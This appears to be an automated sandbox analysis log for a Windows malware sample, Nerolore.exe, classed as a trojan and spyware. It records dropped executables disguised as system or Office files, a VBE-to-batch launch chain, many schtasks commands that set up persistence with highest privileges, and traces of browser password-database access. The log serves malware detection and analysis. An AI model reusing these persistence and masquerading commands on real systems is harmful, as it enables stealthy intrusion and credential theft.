                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF848E60D4829_2_00007FF848E60D48
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF848E60E4329_2_00007FF848E60E43
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF84925CAC029_2_00007FF84925CAC0
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF84925A82B29_2_00007FF84925A82B
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF84925A7AC29_2_00007FF84925A7AC
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF849382E1A29_2_00007FF849382E1A
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF84938457029_2_00007FF849384570
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF8493835C129_2_00007FF8493835C1
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF8493841A329_2_00007FF8493841A3
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF84938301C29_2_00007FF84938301C
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF84938DCC529_2_00007FF84938DCC5
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF8493843C329_2_00007FF8493843C3
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF84938437A29_2_00007FF84938437A
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeCode function: 29_2_00007FF848E7129029_2_00007FF848E71290
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeCode function: 31_2_00007FF848E60D4831_2_00007FF848E60D48
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeCode function: 31_2_00007FF848E60E4331_2_00007FF848E60E43
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 41_2_00007FF848E910AF41_2_00007FF848E910AF
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 41_2_00007FF848E90E5641_2_00007FF848E90E56
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 41_2_00007FF848E9000041_2_00007FF848E90000
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 41_2_00007FF848E80D4841_2_00007FF848E80D48
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 41_2_00007FF848E80E4341_2_00007FF848E80E43
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 41_2_00007FF848E9129041_2_00007FF848E91290
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 42_2_00007FF848E90D4842_2_00007FF848E90D48
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 42_2_00007FF848E90E4342_2_00007FF848E90E43
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 42_2_00007FF848EA10AF42_2_00007FF848EA10AF
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 42_2_00007FF848EA0E5642_2_00007FF848EA0E56
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 42_2_00007FF848EA000042_2_00007FF848EA0000
                              Source: C:\FontHost\ContainerAgentWinSession.exeCode function: 42_2_00007FF848EA129042_2_00007FF848EA1290
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 43_2_00007FF848E50D4843_2_00007FF848E50D48
                              Source: C:\ProgramData\dbg\conhost.exeCode function: 43_2_00007FF848E50E4343_2_00007FF848E50E43
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeCode function: 44_2_00007FF848E80D4844_2_00007FF848E80D48
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeCode function: 44_2_00007FF848E80E4344_2_00007FF848E80E43
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: String function: 00FF6264 appears 97 times
                              Source: Nerolore.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Nerolore.exe
                              Source: Nerolore.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: ContainerAgentWinSession.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: NjWYKcLujkVoPzemFBeg.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: OfficeClickToRun.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: conhost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: NjWYKcLujkVoPzemFBeg.exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: NjWYKcLujkVoPzemFBeg.exe1.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: Nerolore.exeStatic PE information: Section: ZLIB complexity 0.9972673766816144
                              Source: Nerolore.exeStatic PE information: Section: ZLIB complexity 0.9949001736111112
                              Source: Nerolore.exeStatic PE information: Section: cheat ZLIB complexity 0.99721420469935
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@52/56@3/1
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\EmyZUDGW.logJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-2HbjMANWKVWdushT6pWo
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5168:120:WilError_03
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\AppData\Local\Temp\0mqt1et2Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" "
                              Source: C:\Users\user\Desktop\Nerolore.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: Nerolore.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\Nerolore.exeFile read: C:\Windows\win.iniJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 6Bmvgk9A3S.29.dr, aBpv6yHFBi.29.dr, TZCclynNgp.29.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: Nerolore.exeReversingLabs: Detection: 78%
                              Source: Nerolore.exeVirustotal: Detection: 66%
                              Source: C:\Users\user\Desktop\Nerolore.exeFile read: C:\Users\user\Desktop\Nerolore.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Nerolore.exe "C:\Users\user\Desktop\Nerolore.exe"
                              Source: C:\Users\user\Desktop\Nerolore.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe"
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" "
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\FontHost\ContainerAgentWinSession.exe "C:\FontHost/ContainerAgentWinSession.exe"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C21.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E35.tmp" "c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 11 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 10 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\ProgramData\dbg\conhost.exe "C:\Users\All Users\dbg\conhost.exe"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Source: unknownProcess created: C:\ProgramData\dbg\conhost.exe "C:\Users\All Users\dbg\conhost.exe"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ContainerAgentWinSession" /sc ONLOGON /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 9 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\FontHost\ContainerAgentWinSession.exe C:\FontHost\ContainerAgentWinSession.exe
                              Source: unknownProcess created: C:\FontHost\ContainerAgentWinSession.exe C:\FontHost\ContainerAgentWinSession.exe
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\dbg\conhost.exe "C:\Users\All Users\dbg\conhost.exe"
                              Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              Source: C:\Users\user\Desktop\Nerolore.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" "Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\FontHost\ContainerAgentWinSession.exe "C:\FontHost/ContainerAgentWinSession.exe"Jump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"Jump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"Jump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C21.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E35.tmp" "c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\dbg\conhost.exe "C:\Users\All Users\dbg\conhost.exe"
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: shfolder.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: dxgidebug.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: riched20.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: usp10.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
